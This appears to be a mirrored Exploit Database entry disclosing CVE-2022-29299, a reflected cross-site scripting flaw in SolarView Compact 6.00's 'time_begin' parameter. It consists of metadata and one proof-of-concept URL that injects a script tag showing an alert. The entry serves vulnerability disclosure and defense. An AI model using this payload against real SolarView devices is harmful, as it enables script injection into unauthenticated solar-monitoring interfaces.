SolarView Compact 6.00 – ‘time_begin’ Cross-Site Scripting (XSS)

• Exploit Database
• 15 阅读

• 作者： Ahmed Alroky
  日期： 2022-06-14
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/50967/

• # Exploit Title: SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting (XSS)
  # Date: 2022-05-15
  # Exploit Author: Ahmed Alroky
  # Author Company : AIactive
  # Version: ver.6.00
  # Vendor home page : https://www.contec.com/
  # Authentication Required: No
  # CVE : CVE-2022-29299
  # Tested on: Windows
  
  # Proof Of Concept:
  
  http://IP_ADDRESS/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(9)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6